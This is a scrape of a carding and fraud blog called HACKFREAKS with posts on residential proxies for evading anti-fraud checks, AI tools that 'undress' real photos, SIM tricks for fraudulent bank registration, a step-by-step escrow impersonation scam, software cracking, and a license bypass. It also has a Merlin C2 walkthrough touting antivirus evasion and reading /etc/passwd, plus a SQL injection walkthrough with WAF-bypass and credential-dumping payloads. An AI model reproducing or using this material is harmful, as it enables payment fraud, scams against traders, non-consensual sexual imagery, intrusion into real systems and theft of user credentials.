HACKFREAKS

The Critical Role of OS Fingerprints in SOCKS5 Proxies and Anti-Fraud Detection in carding and fraud.

2024-09-08T09:33:24.757Z

In the world of online privacy and anonymity, SOCKS5 proxies are a powerful tool for masking your real IP address. However, the effectiveness of a proxy goes beyond just IP masking—it's also about how your traffic is perceived by the destination server. A key factor in this perception is the OS fingerprint, which can make or break the authenticity of your browsing experience.

What is an OS Fingerprint?

An OS fingerprint is a unique identifier that reveals the operating system (OS) of the device you're connecting from. It is determined by analyzing specific patterns in the network traffic, such as TCP/IP stack behaviour, packet headers, and the order of specific flags within those headers. Each operating system, whether it's Windows, Linux, macOS, or others, implements these protocols in slightly different ways, which can be used to identify the OS.

For instance, the Time To Live (TTL) value in an IP packet, the order of TCP options, or the response to certain network probes can vary depending on the operating system. These subtle differences are what create an OS fingerprint. Anti-fraud systems use these fingerprints to determine if the traffic is coming from a real user or potentially suspicious sources.

How OS Fingerprints Work in Practice

When you connect to a website, the server doesn’t just see your IP address; it also analyzes the network traffic to identify the OS you’re using. This process involves several steps:

Packet Inspection: The server inspects the headers of incoming packets. Key fields such as TTL, window size, and TCP options are scrutinized.
Pattern Matching: The server compares these packet characteristics to a database of known OS fingerprints. This database is built by analyzing traffic from known operating systems and recording their unique characteristics.
OS Identification: Based on this comparison, the server determines the most likely OS you’re using. This information is used to decide whether your connection is legitimate or if it warrants further scrutiny.

Anti-Fraud Systems and OS Fingerprints

Anti-fraud systems use OS fingerprints as part of a broader strategy to detect and block malicious activity. These systems are designed to identify patterns that are unusual or inconsistent with typical user behaviour. For example:

Mismatch Detection: If an IP address is associated with a residential ISP, but the OS fingerprint suggests it's coming from a Linux server (which is uncommon for residential users), this might raise a red flag. The system may suspect that the traffic is coming from a bot or a proxy server rather than a real user.
Behavioral Analysis: Anti-fraud systems also analyze the consistency of OS u across sessions. If a user’s OS fingerprint changes frequently (e.g., from Windows to Linux and back), it could indicate the use of multiple proxies or spoofing techniques, triggering additional verification steps like CAPTCHAs or multi-factor authentication.
Traffic Profiling: By combining OS fingerprints with other data points (such as browser fingerprints, geolocation, and usage patterns), anti-fraud systems can build a detailed profile of the user. Any deviations from this profile can lead to traffic being flagged as suspicious.

The Difference Between Windows and Linux OS Fingerprints

Most SOCKS5 proxies in the market today run on IoT devices or servers that use Linux-based operating systems. While Linux is efficient, it presents a distinctive fingerprint that is not typical of residential user devices. This can be a disadvantage in scenarios where authenticity is critical.

Linux Fingerprints: Linux-based proxies are often detected due to their distinctive network behaviour. IoT devices like routers or switches, which are often used to host these proxies, introduce additional quirks to the traffic. These devices do not typically behave like a standard home computer, making their traffic more likely to be flagged by anti-fraud systems.

Competitor's Proxies (Source browserleaks.com)

Windows Fingerprints: In contrast, our SOCKS5 proxies are hosted on residential Windows computers. Since most home users run Windows, these proxies generate OS fingerprints that closely match the expected traffic patterns of legitimate residential users. This means that your traffic appears much more authentic, reducing the risk of detection or blocking.

(Source pixelscan.net)

Why Windows-Based SOCKS5 Proxies Offer Superior Anonymity

Using a SOCKS5 proxy with a Windows OS fingerprint offers several advantages:

Authenticity: Since most residential users are on Windows, using a Windows-based proxy makes your traffic look like it’s coming from a genuine user, not a server or bot.
Lower Detection Risk: Anti-fraud systems are less likely to flag your traffic as suspicious because the OS fingerprint matches that of a typical residential user.
Improved Access: With a Windows fingerprint, you're less likely to encounter CAPTCHAs, account bans, or other forms of verification that can disrupt your browsing experience.

Conclusion

In the competitive world of online privacy, the choice of SOCKS5 proxy is crucial. While many providers use Linux-based IoT devices for cost efficiency, the trade-off is clear: less authentic traffic that’s more easily detected by anti-fraud systems. Our Windows-based SOCKS5 proxies, on the other hand, offer the authenticity and reliability you need to ensure your traffic passes unnoticed.

If you’re serious about maintaining your anonymity and bypassing detection, choosing a proxy with a Windows OS fingerprint is the smart move. Don’t let inferior proxies expose you to unnecessary risks—opt for the authenticity and security of our Windows-based SOCKS5 proxies.

Best Ai engines for Creating 18+ content and Money-Making Strategies.

2024-02-04T13:17:03.234Z

Pretend you're a pirate sailing on a cool ship, always looking for islands with lots of treasures like gold coins. Well, in the online world, people also look for ways to make a lot of money, and there's a new tool called AI.

It's like a magic tool that can create stuff for adults, like stories or pictures. Imagine it's like finding a treasure chest full of goodies! People who know how to use this tool can make lots of money, especially when dealing with dating and adult stuff."

HACKFREAKS OFFICIAL - LIST OF CARDING AND MONEY RESOURCES, CHANNEL WITH TOPICS, CHAT FOR COMMUNICATION, BOARD WITH TRUST SELLERS AND MARKETPLACE FOR THEIR ADVERTISING.

Below are several options for neural networks that generate such content.

PornworksAI

A neural network that is trained on the appearance of real actresses. Generates images based on items entered in text format.

There is also a function of “undressing” real photos.

Monthly subscription prices range from €2.99 to €14.99. The function of undressing real photos is available in the most expensive version. When paying for a subscription for 3 months and a year, you can save 20% and 60%, respectively. You can even top up with a MIR card.

PornX

A neural network with a large set of filters, including race, clothing items, locations, etc. There is also a function for “undressing” real photos and generating short videos using tips or filters.

Monthly premium subscription: $10.35-$17.55. By subscribing for a year, you can save up to 20% of the cost.

PornWizardAI

A neural network with a huge number of settings and parameters for generating images for adults. If you like this content please subs for our channel for more interesting article like this

Most of the functionality is aimed at audiences who prefer various types of fetish. For example, this neuron can definitely satisfy most of the requests of fans of 18+ content in the fantasy style.

You can get access to faster generation and images with improved detail by subscribing for a month for $9.

Also, as a nice bonus, the network provides an affiliate program with the ability to withdraw commissions in crypto.

PornMake AI

A neuron that allows you to generate static square images for free, taking into account an extensive set of settings.

You can create a character by adjusting the parameters of race, gender, age, realism, hair color and type, face, build and size of individual parts of the body, as well as clothing, actions, location and background. The paid version also offers custom pose settings and cosplay of characters from games, fantasy and anime.

The cost of a premium subscription at the time of writing remains unknown due to the deletion of the account on the Patreon platform, through which the creators of the service collected donations.

Unstable Diffusion

A version of the Stable Diffusion neural network for creating more piquant content.

Like its ancestor, the neuron operates on Discord and generates images for adults based on text messages.

The neuron has a credit system. In the free version, the balance is updated once every 24 hours. In the paid version, the number of credits and the availability of additional features depends on the selected subscription option.

Premium subscriptions range from $14.99 to $59.99 per month.

PornJourney

Generates both static images and short videos.

Generation is based on a system of ready-made filters. In addition to videos and realistic pictures, a hentai version is available with a large selection of different settings and filters.

In the premium version, clothing editing and “undressing” are available.

The monthly subscription costs $14.99. If you sign up for a year, the premium will cost $89.99.

PornPen AI

One of the very first porn neural networks. During its existence, the developers have added many new functions and improved the technical capabilities of content generation. In the settings you can even add parameters such as the presence of accessories and type of clothing.

In the free version, generating one image can take up to 5 minutes.

To gain access to creating gifs, HD images in uncropped format, smart editing and obtaining the right to use for commercial purposes, you must subscribe to a paid subscription.

A month of the Pro version costs only $14.99.

Sexy AI

A simple neural network based on text queries. Generates images depending on the detail of the description. In the paid version, generation of short videos is also available.

Paid subscription is paid through the boosty service. The cost of use for a month is $15.5.

Bottom line

Our brief review of neural networks for creating adult content shows that using this tool is becoming easier every day. Many services generate images that are quite realistic for even the most sophisticated audience. And the affiliate can recoup the cost of the paid version from the very first lead attracted by such AI creative.

SIM cards - What does antifraud see when registering in banks or fraud ?

2024-01-16T14:20:56.576Z

Hello my little freaks, what can I say? Let me start with the fact that it’s 2024, and just like a year earlier, I receive messages from subscribers about the fact that they don’t give a damn about Google Voice and similar services. And if when working in EU countries as a whole (in most cases), no one really gives a damn about what number you register the bank for and you can use the well-known Hushed, then when working with the same system there are a hell of a lot more of these nuances, precisely for the reason that already For many years, our, so to speak, colleagues (and not only them, but also traffickers, and simply registrars ~~of varying degrees of salting~~ with different levels of experience), used GV and other voips to register acceptance banks. In short, there’s no point in ranting, let’s move on to the harsh theory.

Well, at the beginning, it’s worth making an amendment that SIM cards are only a small part of successful registration, but sometimes no less important. Different banks pay attention to completely different points - some are interested in the state/area code, others are interested in the presence of the number in the Kyrgyz Republic, technically antifraud providers can even check who the number is registered to if the operator shares this information (but at the moment this practice is more likely exception rather than the rule).

1. Checking the number using credit bureaus/TLO services.

Some banks check information with credit bureaus when you register as a bank. They make a request, the so-called soft inquiry, to check for friezes, quick credit and fraud alerts, during which they also receive data on numbers previously used to provide any financial services to the holder.
To put it simply, complex banks may even require an SMS to the number from the report if it differs from the one specified during registration. I won’t talk about ways to add in the public ~~because I’m a greedy guy,~~ but of course I can give general recommendations. A number added to the bank recently is, as a rule, not a trust number and, on the contrary, can cause fraud, for example, when registering credit cards. and if you like what you are reading please hit a like and subscribe to our hackfreaks official channel. Back on topic. Also, for some offices, the Primary Number is important, which can only be changed through direct contact with the office, and not through inquiry. Well, if you take those banks that require an SMS to a number from the country, then you need to wait quite a long time for it to be reflected during their registration. As for TLO, information from which financial offices request - this is something like bg services, only not for individuals, but for organizations whose activities may require searching for information about people. They provide much more information, but registering to use their services is unrealistic, so to our joy, in some cases they use the same algorithms as well-known bg services, which means you can rely on information from these same bg services.
By the way, some offices see much more than what is written in the bg/ownerr, so sometimes when registering two offices in a row with the same number and number, the second one can only pass by obtaining data from the database used by the antifraud, while we do not We will find this number neither in owner nor in bg.

2. Area codes and states.

In general, everything here is quite logical and there is nothing special to sort out - some banks require a number for the state without adding it to the bank, so it’s especially bad to add to this point - I’ll leave useful links below, you’ll see everything for yourself.

*Wikipedia article with area codes*

3. Room type.

In general, this is exactly the reason why, when registering with Google Voice/pings, it sends you to hell - there are databases in the public domain from which you can get information about the type of number, be it VoIP, landline (home) or wireless (mobile). Most banks declaring VoIP, some also declaring home numbers - you can check this, for example, here . By the way, not all numbers are VoIP on PingMe - the registrars simply change the numbers until the site issues a wireless line.

4. The room is clogged.

In general, I really can’t say that this parameter can actually be tracked and that it directly affects registration. But, in practice, if, for example, your office went into lock-down, then even if you change the full card, you shouldn’t change other banks to it, and in general it’s worth using 1 number with 1 full card, and if you’re fucked, how should you make a withdrawal for the same person - it’s better to change the line, because when re-registering, the old number can cause declines. Or maybe not, in any case, you can check the reputation of the number on ipqualityscore, and even if there is a warning about it, then you should definitely throw it the fuck away.

Small notes that may be useful at work.

When using numbers from the textverified site and similar sites that use the same provider (by the way, there are really a lot of them and they all have different prices, well, by the way), rentals for multiservice do not accept numbers from some banks - in this case, you can use rentals for a specific the bank is there.
When working with banks that do not send 2FA to the number at the time of registration, you can indicate the holder’s number, and then add yours to the account/enroll - depending on the bank.

Useful links for information about rooms:

IPQualityScore Phone Number Validation - most information about the number

Phone Validator - landline/wireless/voip + state

Well, something like this. Let me remind you once again that this is not a universal recommendation for working with banks/vcc, but rather a certain set of information that they may request. Even in 2023, there are companies that frankly don’t give a fuck and they even refuse voips (even though there are very few of them), and most of the undeveloped banks don’t give a fuck about staff/cr and so on. To say the least, profits for everyone and easy registrations. HACKFREAKS was with you as always . Peace.

List of projects to replace ChatGPT.

2023-11-13T21:36:54.882Z

Without registering:

1. Perplexity AI [ https://www.perplexity.ai/ ] (web-browsing)

2. Vitalentum [ https://vitalentum.net/free-gpt ]

3. Vicuna [ https://chat.lmsys.org/ ]

4. GPTGO [ https://gptgo.ai/ ] (web-browsing)

5. AnonChatGPT [ https://anonchatgpt.com/ ]

6. NoowAI [ https://noowai.com/ ]

7. Character AI [ https://beta.character.ai/ ]

8. BAI Chat [ https://chatbot.theb.ai/ ]

9. iAsk AI [ https://iask.ai/ ] (web-browsing)

10. Phind AI [ https://www.phind.com/ ] (web-browsing)

11. GPT4All [ https://gpt4all.io/index.html ] (open-source)

12. DeepAI Chat [ https://deepai.org/chat ]

13. Teach Anything [ https://www.teach-anything.com/ ]

With registration:

14. Poe AI [ https://poe.com/ChatGPT ]

15. Bard [https://bard.google.com/] (web-browsing)

16. Easy-Peasy AI [ https://easy-peasy.ai/ ]

17. Forefront AI [ https://chat.forefront.ai/ ]

18. OraChat [ https://ora.ai/chatbot-master/openai-chatgpt-chatbot ]

19. HuggingChat [ https://huggingface.co/chat ] (web-browsing)

20. WriteSonic [ https://app.writesonic.com/chat ]

21. FlowGPT [ https://flowgpt.com/chat ]

22. Sincode AI [ https://www.sincode.ai/ ]

23. AI.LS [ https://ai.ls/ ]

24. LetsView Chat [ https://letsview.com/chatbot ] (free only 10 messages)

25. CapeChat [ https://chat.capeprivacy.com/ ]

26. Open-Assistant [ https://open-assistant.io/ ] (open-source)

27. GlobalGPT [ https://www.globalgpt.nspiketech.com/ ]

28. Bing Chat [bing.com/chat]

29. JimmyGPT [ https://www.jimmygpt.com/ ]

30. Codeium [ https://codeium.com/ ] (mainly for programming)

31. YouChat [you.com/chat]

32. Frank AI [ https://franks.ai/ ]

33. OpenAI Playground [platform.openai.com/playground]

To write blog articles (with a chatbot):

34. Copy AI [ https://app.copy.ai/ ]

35. TextCortex AI [ https://app.textcortex.com/ ]

36. Marmof [ https://app.marmof.com/ ]

37. HyperWrite [ https://app.hyperwriteai.com/chatbot ]

38. WriterX [ https://app.writerx.co/ ]

To work with files (PDF, etc.):

39. AnySummary [ https://www.anysummary.app/ ] (3 per day)

40. Sharly AI [ https://app.sharly.ai/ ]

41. Documind [ https://www.documind.chat/ ]

42. ChatDOC [ https://chatdoc.com/ ]

43. Humata AI [ https://app.humata.ai/ ]

44. Ask Your PDF [ https://askyourpdf.com/ ]

45. ChatPDF [ https://www.chatpdf.com/ ]

46. FileGPT [ https://filegpt.app/chat ]

47. ResearchAide [ https://www.researchaide.org/ ]

48. Pensieve AI [ https://pensieve-app.springworks.in/ ]

49. Docalysis [ https://docalysis.com/ ]

The best chatbot assistants:

1. Pi, your personal AI [ https://heypi.com/talk ]

2. Kuki AI [ https://chat.kuki.ai/ ]

3. Replika [ https://replika.com/ ]

4. YourHana AI [https://yourhana.ai/]

Guarantor/Escrow Scam

2023-09-21T13:13:26.610Z

Hello freaks Sup👋. Today in Hackfreaks we'll see how they do this kinda scam. ⚠️Sharing this strictly for educational purposes only. please don't misuse it.

Instructions:

1) First, let's choose who and what we will scam.

2) After choosing, we write that we are ready to deal with the guarantor.

3) This is important! We create a group (namely we) and add a seller and a guarantor.

4) As soon as the guarantor writes the payment details, we begin to stall for time, for example: “I'll exchange the cue ball now, wait 10-20 minutes.”

5) At this stage, we quickly make a copy of the guarantor's account.

6) Now we remove the real guarantor from the group, and add the newly created copy of the guarantor's account, and delete the SMS about deletion and joining.

7) There are already two ways here: either the seller will detect a fake, or he will not notice anything. If he didn't notice, then we write on behalf of the guarantor that payment has been received, and the seller must discard the goods.

🔥 Stop suffering with bullshit, it's time to earn money with Hackfreaks Team

PROFITS TO ALL 💎

HACKFREAKS OFFICIAL - LIST OF CARDING RESOURCES, CHANNEL WITH TOPICS, CHAT FOR COMMUNICATION, BOARD WITH TRUST SELLERS AND MARKETPLACE FOR THEIR ADVERTISING 🤙🏿

How to download any program from adobe for free

2023-08-23T19:30:02.574Z

We get adobe programs for free!

The article is educational in nature, we do not call for anything and do not oblige. The information is presented for informational purposes only.

start :

First of all: go to the adobe creative cloud website and download it:

https://creativecloud.adobe.com/apps/download/creative-cloud

Point 2 - downloading the applications you need.

You will have them for 7 days for free, but in this guide we will get them forever.

After downloading the programs, go to github and download the keygen.

https://github.com/cw2k/Adobe-GenP

Point 3 - flashing for a license. Open this program:

We press search and it searches for all adobe programs:

After we found it, we press the patch and you now have all the programs with a license!

That's all. good luck!

(SCAM)Making a realistic female voice in real time.

2023-08-17T14:06:17.756Z

Making a female voice!

The article is educational in nature, we do not call for anything and do not oblige. The information is presented for informational purposes only.

That's all. good Luck!

How to bypass antivirus protection

2023-08-08T14:40:34.501Z

Merlin is an HTTP/2 Command & Control (C&C) server for multi-platform Post exploitation written in Golang. Merlin is based on a client-server architecture and uses the HTTP/2 protocol for communication between server and host agents

Figure 1 shows how Merlin can be used during a pentest.

Security Bypass with HTTP/2

By using the HTTP/2 protocol during Merlin connections, we achieve better network resource utilization and lower perception of latency by introducing header compression and allowing multiple concurrent communications on the connection itself. This new protocol has been validated against RFC7450 and can be seen as a way to solve some of the HTTP/1.x problems.

Since this is a new protocol, it will cause problems on IDS/IPS devices.

In short, existing tools are not equipped to or validate this protocol. Also, HTTP/2 is a binary protocol which makes it more compact, easy to parse and not user readable without using AV.

Today, security devices cannot understand the HTTP/2 protocol and are even able to decrypt network traffic for control. The combination of encryption and the lack of protocol support from inspection tools provides an excellent opportunity to avoid detection.

In this step, we will show how Merlin can be used to establish C&C communications during a pentest.

Let's start by downloading Merlin from the GitHub page. To do this, we need to enter the following command in our terminal. Please note that the Kali Linux distribution was used to run this wizard.

git clone https://github.com/Ne0nd0g/merlin.git

Next, you need to create an SSL certificate to use the encryption channel and establish connections between the server and host agents. The resulting files should be created in the "/data/x509" folder with the following command.

Figure 2: Generate SSL key - Merlin server in "/data/x509" folder.

Create a Linux agent

On the Merlin server side, Merlin must be running before the agents can be started. Use the following command:

Rice. 3. O. Merlin server running on localhost: 127.0.0.1:443.

After starting the Linux agent on the central target host, a new connection is made to the Merlin server. To start, you need to use the command, for example:

agent list - list of available agents
interact [id] - interaction with the specified agent
cmd cat /etc/passwd Download the contents of the passwd file located at /etc/passwd

Rice. 4: Merlin connection with Linux agent loaded from "/etc/passwd" file.

In addition, other commands and modules can be used via the command help.

Figure 5: Merlin units available.

Another interesting part of this tool is the ability to create agents for various operating system architectures. The custom-designed payload will then be built on the highly secure, updated Windows 10 operating system.

Performing a Windows Defender scan for this particular agent ( agent_windows.exe), we can verify that it was not detected.

Figure 6: O Merlin Agent for Windows bypasses Windows Defender.

In this case, the Merlin server must run with the following options: -i [local IP address] and -p [local port]. This data was encrypted with a binary system ( agent_windows.exe ).

Figure 7: Start the Merlin server with a specific IP port/port.

The payload avoids detection of its signature in Windows 10 with a fully updated Microsoft Windows Defender.

The agent will then be executed:

Figure 8: O Agent Merlin was running a fully updated Windows 10 bypassing Windows Defender.

A new connection has been received on the Merlin server as shown below.

From here, a set of native Windows commands can be used via the cmd command and several modules such as gathering, mimikatz, sharphound, credential thieves and more.

Figure 9: Merlin server interacting with the Windows agent.

Low AV detection rate.

After the tests were done, the sample was tested on VirusTotal and only 13 out of 68 AVS identified the Merlin agent as malicious.

Figure 10: Low detection rate of the Merlin agent on Windows, as shown in VirusTotal.

Which AV bypasses:

Windows Defender
Kaspersky
Malwarebytes
Silence
McAfee
Symantec

Figure 11: AV bypassed by the Merlin agent.

Finally, Merlin is a cross-platform post-exploitation framework that uses HTTP/2 communication to avoid detection and bypass security devices and AV detection.

HTTP/2 is a relatively new protocol that breaks through Perfect Forward Secretary (PFS) encrypted packets. AV avoidance is achieved each time a new Merlin agent is created. Golang is a great tool with the ability to create standalone binaries in a single binary and has many features that make it a very powerful language. Another interesting detail is that it has been compiled to native code, so it has good performance and can bypass its detection because of that.

openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out server.crt -subj “/CN=infosecinstitute” -day 7

GOOS=linux GOARCH=amd64 go build -ldflags "-X main.url=https://127.0.0.1:443" -o agent_linux main.go

#run the agent on the target host

chmod + x agent_linux && ./agent_linux

sudo go run cmd /merlinserver/main.go -i [ip-address]

GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://192.168.0.165:8080" -o agent_windows.exe main.

go run cmd /merlinserver/main.go -i 192.168.0.165 -p 8080

🦾 Bypass 10 profiles for free in the anti-detect browser.

2023-06-24T18:15:56.101Z

Today I will tell you how to use the Dolphn {anty} anti-detect browser with the ability to create more than 10 profiles absolutely for free. Method did not belong to me. All credits goes to it's author. ps : unknown or if you know comment in chats.

For those who are not in the know, the antidetect browser allows you to create an infinite number of browser profiles (special accounts inside the browser) in a couple of clicks. Each profile will not be similar to the other and thus, the resources will see us as a unique user. In general, a must-have in the arsenal of any self-respecting abuser.

1. Follow the link (https://www.python.org/downloads/) and install "Python 3.11.2";

└ Be sure to check the box next to "Add python.exe to PATH";

2. Follow the link (https://bit.ly/3slwxEt) and register a new account in "Dolphn{anty}" or use your old one;

3. Download the browser itself and install it;

4. Launch the browser and log in to the account, where there are no more than 9 profiles;

5. Follow the link (https://github.com/yagiraa/dolphin-free) and download the software, then extract it from the archive;

6. Copy the "app.asar" file (it is located in the "Files" folder), go to the folder with the installed browser ("*\Dolphin Anty\resources") and paste the "app.asar" file there with the replacement

7. Press the key combination Win + R and enter "cmd" into the search engine;

8. Paste the following code into the command line

cd /d "path to script folder"

pip install -r requirements.txt

9. Without closing the console, write the script update command: "python.exe -m pip install --upgrade pip"

10. We return to the folder with the software and double-click on the "main, py" file to launch the script itself and the browser

└ If, when starting the browser, the script displays such purple inscriptions and "ERROR" at the beginning

, then it means you ran the script incorrectly, run the script strictly from the software folder;

11. Congratulations, you are amazing!

give it a like👍 Anonymity to all ✌️

Bypass to perform advanced SQL injection based on errors.

2023-06-21T17:08:29.821Z

Hello my little Freaks. Hackfreaks Here! Without Further ado let's jump Into the topic. Well During penetration testing, I came across a website that in this article I will call http://domain.com.

Looking through the website, I didn't see any option, even though the website was built in PHP. I quit browsing and started using Google Dorking.

Google Dorking to find endpoints

Using simple dork inurl:http://domain.com, I was able to get some interesting endpoints:

Selected text on the image leads to an interesting point: http://domain.com/REDACTED/news.php?id=13

When opening the URL, I encountered a MySQL error. Even from Google dork output you can see it:

Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean give in … on line 27

The error is very valuable to us, because we know that we can perform some logical queries. Let's start operating.

Website behavior analysis

I tried a few basic queries to see how the site behaves. When entering an incorrect request, 2 errors are issued (1 which was by default and another which was caused by us).

So we know that if our request is correct, we only get 1 error message, otherwise we get 2 error messages. one more thing. If you like this then subs to our Hackfreaks Official would be great. Thanks to this valuable information (which took me time to figure out), let's get the number of columns with a query ORDER BY.

Finding the number of columns with Boolean + ORDER BY

Since the server is expecting a boolean statement, I can use query AND 0, but some other boolean queries can also be used:

AND null
AND 1

Now let's add both a boolean string and a query to our query ORDER BY. I always try to start by looking for a column with the number 1, because I am 100% sure that the site will not show any error.

http://domain.com/REDACTED/news.php?id=13 AND 0 order by 1-- -

We only get 1 error message (from the website, not from our request). Now that we know our query is correct, let's try increasing the number of columns by 1 until we get the second error.

?id=13 AND 0 order by 1-— - (shows 1 error)
?id=13 AND 0 order by 2 — — (shows 1 error)
?id=13 AND 0 order by 3-— — (shows 1 error)
?id=13 AND 0 order by 4-— — (shows 1 error)
?id=13 AND 0 order by 5-— — (shows 1 error)
?id=13 AND 0 order by 6-— — (shows 2 errors)

The second error message appears when we try to find the 6th column. So this means the database only has 5 columns.

?id=13 AND 0 order by 6-— —

Before proceeding, let's make sure once again that the database has 5 columns.

?id=13 AND 0 order by 5-— —

Traversing the WAF and Finding a Column to Dump

Now we are sure because we don't get the second error. It's time to find which of these 5 columns will allow us to get the data using a query UNION SELECT.

http://domain.com/REDACTED/news.php?id=13 AND 0 union select 1,2,3,4,5-- -

However, our request was blocked by WAF, let's try to get around the ban. There are tons of UNION queries to bypass WAF, but what worked in this case was:

http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5-- -

We bypassed the WAF, however the number is not displayed. Because of this, we don't know which columns we are going to drop. I looked through the whole page but didn't find anything, so I decided to look through the source code.

In the highlighted part, we see the numbers 2 and 3. Great, now we know that we should focus on these 2 columns. In this case, I'll try the second column.

Dump all data from second column

Finding the database name

With a query based, UNIONlet's get the name of the database.

http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database(),3,4,5-— -

Great, we see the name of the database.

Automatic dump of tables + columns with DIOS

I'll try to inject the DIOS payload because getting each column for each table by hand is very long and boring. The DIOS payload I used is specifically built for WAF traversal using 0xHEX transform and /*!00000string traversal.

http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,/*!00000concat*/(0x3c666f6e7420666163653d224963656c616e6422207374796c653d22636f6c6f723a7265643b746578742d736861646f773a307078203170782035707820233030303b666f6e742d73697a653a33307078223e496e6a6563746564206279204468346e692056757070616c61203c2f666f6e743e3c62723e3c666f6e7420636f6c6f723d70696e6b2073697a653d353e44622056657273696f6e203a20,version(),0x3c62723e44622055736572203a20,user(),0x3c62723e3c62723e3c2f666f6e743e3c7461626c6520626f726465723d2231223e3c74686561643e3c74723e3c74683e44617461626173653c2f74683e3c74683e5461626c653c2f74683e3c74683e436f6c756d6e3c2f74683e3c2f74686561643e3c2f74723e3c74626f64793e,(select%20(@x)%20/*!00000from*/%20(select%20(@x:=0x00),(select%20(0)%20/*!00000from*/%20(information_schema/**/.columns)%20where%20(table_schema!=0x696e666f726d6174696f6e5f736368656d61)%20and%20(0x00)%20in%20(@x:=/*!00000concat*/(@x,0x3c74723e3c74643e3c666f6e7420636f6c6f723d7265642073697a653d333e266e6273703b266e6273703b266e6273703b,table_schema,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d677265656e2073697a653d333e266e6273703b266e6273703b266e6273703b,table_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c74643e3c666f6e7420636f6c6f723d626c75652073697a653d333e,column_name,0x266e6273703b266e6273703b3c2f666f6e743e3c2f74643e3c2f74723e))))x)),3,4,5 -- -

Dump data inside columns

Great, we have tables and columns for each table. Of all the tables, I focus on the following.

Here's what caught my attention. I will focus on a table userand data dump of 2 columns: usernameand password.

The final payload will be as follows:

http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,(SELECT+GROUP_CONCAT(username,0x3a,password+SEPARATOR+0x3c62723e)+FROM+kbelb_db.user),3,4,5-- -

Now we look at the source code and see the username and password of the administrator or user.